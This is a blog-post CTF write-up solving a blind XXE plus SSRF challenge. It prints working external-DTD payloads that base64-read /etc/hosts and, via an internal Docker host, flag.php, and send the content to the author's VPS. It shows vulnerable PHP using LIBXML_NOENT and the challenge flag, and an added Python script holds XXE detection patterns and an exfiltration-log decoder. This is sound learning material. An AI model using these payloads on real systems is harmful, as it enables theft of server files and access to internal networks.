<!DOCTYPE html>
<html lang="en">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="A challenge combining an XXE vulnerability and SSRF"/>




  <meta name="keywords" content="ctf, writeup, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2018/01/14/一道XXE和SSRF的题目/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  










    <title> A challenge combining an XXE vulnerability and SSRF - 八一 </title>
  </head>

  <body>


    <div class="container" id="mobile-panel">

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          A challenge combining an XXE vulnerability and SSRF
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2018-01-14
        </span>
        
        
        
      </div>
    </header>

    
    

    <div class="post-content">
      
        <blockquote>
<p>It's exam week at school, ennnn..... and they held the school CTF.<br>I ran into a challenge combining XXE and SSRF, which I thought was pretty good, so here's a quick write-up.</p>
</blockquote>
<a id="more"></a>
<p>I'll only record the process here; for the underlying principles there are a few links (I went over them again at the time).<br>The veterans write it up better than I do.</p>
<p><a href="https://security.tencent.com/index.php/blog/msg/69" target="_blank" rel="noopener">Know the attack to know the defense: XXE vulnerability attack and defense</a><br><a href="https://b1ngz.github.io/XXE-learning-note/" target="_blank" rel="noopener">XXE vulnerabilities: a simple explanation and tests</a></p>
<blockquote>
<p>Opening the challenge, it is clearly XXE with no output echoed back (blind XXE), so I'll go straight to the solution.<br>First, place a file named file.dtd on the VPS with the following content:</p>
</blockquote>
<figure class="highlight plain"><pre><code>&lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///etc/hosts&quot;&gt;
&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'&gt;&quot;&gt;</code></pre></figure>
<blockquote>
<p>Payload submitted at the vulnerable input</p>
</blockquote>
<figure class="highlight xml"><pre><code>&lt;!DOCTYPE convert [ &lt;!ENTITY % remote SYSTEM "http://我的VPS地址/file.dtd"&gt;%remote;%int;%trick;]&gt;</code></pre></figure>
<blockquote>
<p>Check the server log (for nginx it is usually /var/log/nginx/access.log)</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/14/ptDX9I.png" alt="xxessrf"></p>
<blockquote>
<p>Base64-decode it</p>
</blockquote>
<figure class="highlight plain"><pre><code>127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.17.0.6	flag 5e8af79b12ae xxessrf_flag_1
172.17.0.6	flag_1 5e8af79b12ae xxessrf_flag_1
172.17.0.6	xxessrf_flag_1 5e8af79b12ae
172.17.0.7	74791d7ac29b</code></pre></figure>
<blockquote>
<p>Hmm???? There's another layer??? Next, keep going and read index</p>
</blockquote>
<figure class="highlight php"><pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;

	&lt;title&gt;XML&lt;/title&gt;
	&lt;link rel="stylesheet" href="./bootstrap.min.css"&gt;
	&lt;script src="./jquery.min.js"&gt;&lt;/script&gt;
	&lt;script src="./bootstrap.min.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;

&lt;form role="form" id="form" method="POST" action="index.php"&gt;
	&lt;div class="form-group"&gt;
		&lt;label for="name"&gt;XML&lt;/label&gt;
		&lt;textarea class="form-control" rows="6" name="data" placeholder="
&lt;code&gt;
	&lt;body&gt;Hello World!&lt;/body&gt;
&lt;/code&gt;
"&gt;&lt;/textarea&gt;
	&lt;/div&gt;
  &lt;div class="btn-group"&gt;
    &lt;button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()"&gt;SUBMIT&lt;/button&gt;
  &lt;/div&gt;
  &lt;?php
  	error_reporting(0);
	include("flag.php");
	if(isset($_POST['data']) and $_POST['data'] != "") {
		$xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
	}

?&gt;
  &lt;/form&gt;</code></pre></figure>
<blockquote>
<p>Oh?? Circled include("flag.php"), tried reading it directly, no response, which figures; there was also the SSRF hint.<br>With that, the morning's work was basically over; the rest was spent staring blankly until the afternoon......<br>xxessrf??? Started probing internal ports.... from 8080..... to 2018.....<br>Hmm, gave up partway..... then picked it up again at the end and posted the hosts screenshot in the team group once more</p>
</blockquote>
<p>What's that 172.17.0.7 of yours?</p>
<blockquote>
<p>.......docker, internal network<br>Read the flag</p>
</blockquote>
<figure class="highlight plain"><pre><code>&lt;!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.6/?file=php://filter/read=convert.base64-encode/resource=flag.php"&gt;
&lt;!ENTITY % int "&lt;!ENTITY &amp;#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'&gt;"&gt;</code></pre></figure>
<figure class="highlight plain"><pre><code>UEQ5d2FIQWdDaTh2WldOb2J5QWlZM1Z0ZEdOMFpudENNV2x1TTE5NGVETmZZVzVrWDNOemNtWmZNWE5mUTI5dmJEOTlJanNLUHo0S0NnPT0=

...

&lt;?php
//echo "cumtctf{B1in3_xx3_and_ssrf_1s_Cool?}";
?&gt;</code></pre></figure>
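<p>The script below is an added example written for this write-up; it is not code from the original post or from the challenge. It covers two points of the chain above from the defender's side: the check a safe handler would apply to the XML that the <code>index.php</code> form accepts before it reaches <code>simplexml_load_string</code> (in the PHP itself the fix is to stop passing <code>LIBXML_NOENT</code> and to refuse any document that carries a DOCTYPE), and the decoding of the callback requests that land in the collector's nginx access log, which is the base64 step above done by hand. The host names, addresses, DTD URL and log lines are constructed for the example; the <code>p</code> parameter name is the one the write-up's DTD uses.</p>

```python
"""Added example, not part of the original post or the challenge: defender-side
checks for the blind XXE -> SSRF chain described in the write-up.

* xxe_indicators() inspects submitted XML before parsing and names the DTD
  constructs the chain depends on.
* decode_exfil() scans nginx access-log lines for callback requests that carry
  a base64 blob in a query parameter and decodes it, which is how exfiltrated
  file content shows up in the collector's log.

Hosts, addresses, the DTD URL and the log lines are constructed for the example.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# DTD constructs used by the chain. Any DOCTYPE at all is enough to refuse
# untrusted XML; the other patterns explain *why* a document was refused.
_PATTERNS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "external_entity": re.compile(r"<!ENTITY\b[^>]*?\b(SYSTEM|PUBLIC)\b", re.I | re.S),
    "php_wrapper": re.compile(r"php://", re.I),
    "file_scheme": re.compile(r"file://", re.I),
}

# nginx "combined" log format, enough of it to recover source, time and request.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed inputs: the write-up's DOCTYPE payload with a placeholder DTD host,
# and the benign placeholder document the challenge form suggests.
PAYLOAD = ('<!DOCTYPE convert [ <!ENTITY % remote SYSTEM '
           '"http://dtd-host.invalid/file.dtd">%remote;%int;%trick;]><root/>')
BENIGN = '<code><body>Hello World!</body></code>'

# Constructed access-log lines: the DTD fetch, one callback carrying
# base64("127.0.0.1\tlocalhost\n"), ordinary traffic, and an unparsable line.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Jan/2018:10:21:33 +0800] "GET /file.dtd HTTP/1.0" 200 233 "-" "-"',
    '203.0.113.10 - - [14/Jan/2018:10:21:33 +0800] "GET /?p=MTI3LjAuMC4xCWxvY2FsaG9zdAo= HTTP/1.0" 404 0 "-" "-"',
    '198.51.100.7 - - [14/Jan/2018:10:22:01 +0800] "GET /?p=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'not an access-log line at all',
]


def xxe_indicators(xml_text):
    """Return the names of the XXE-related constructs present in xml_text.

    An empty list means none were found. A safe handler rejects the input when
    the list is non-empty instead of handing it to an entity-expanding parser.
    """
    return [name for name, pattern in _PATTERNS.items() if pattern.search(xml_text)]


def decode_exfil(log_lines, param="p", min_len=16):
    """Find callback requests whose query parameter `param` is a base64 blob.

    Returns one dict per hit with the source address, timestamp and decoded
    content. Short values and values that are not valid base64 are skipped so
    ordinary traffic using the same parameter name is not reported.
    """
    hits = []
    for line in log_lines:
        match = _LOG_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for value in parse_qs(query).get(param, []):
            # parse_qs turns '+' into ' '. Base64 never contains spaces, so
            # putting '+' back recovers the blob exactly as it was sent.
            value = value.replace(" ", "+")
            if len(value) < min_len:
                continue
            try:
                raw = base64.b64decode(value, validate=True)
            except binascii.Error:
                continue
            hits.append({
                "src": match.group("ip"),
                "time": match.group("time"),
                "decoded": raw.decode("utf-8", errors="replace"),
            })
    return hits


if __name__ == "__main__":
    print("payload indicators:", xxe_indicators(PAYLOAD))
    print("benign indicators:", xxe_indicators(BENIGN))
    for hit in decode_exfil(SAMPLE_LOG):
        print(f"{hit['time']} {hit['src']} exfiltrated: {hit['decoded']!r}")
```

<p>Run stand-alone it reports the three indicators found in the write-up's payload, none for the benign document, and one decoded callback from the constructed log. The <code>min_len</code> threshold and the strict base64 validation are what keep a normal <code>?p=2</code> request out of the results; for a real log, feed <code>decode_exfil()</code> the lines from access.log and adjust <code>param</code> to whatever name the callback used.</p>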
<blockquote>
<p>Haven't done challenges in a long time; my brain's a bit rusty......</p>
</blockquote>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/writeup/">writeup</a>
            
          </div>
        
        
        

      </footer>
    

  </article>


          </div>
          
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">



<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

    </div>

    
  



    
  





  
  </body>
</html>
